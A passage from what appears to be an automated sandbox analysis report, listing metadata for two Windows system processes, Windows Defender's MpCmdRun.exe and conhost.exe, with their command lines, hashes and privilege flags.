                                                                                                                                                              Reputation:low

                                                                                                                                                              Target ID:12
                                                                                                                                                              Start time:05:27:43
                                                                                                                                                              Start date:13/03/2023
                                                                                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                              Imagebase:0x7ff7f6840000
                                                                                                                                                              File size:455656 bytes
                                                                                                                                                              MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              Target ID:13
                                                                                                                                                              Start time:05:27:43
                                                                                                                                                              Start date:13/03/2023
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff745070000
                                                                                                                                                              File size:625664 bytes
                                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              No disassembly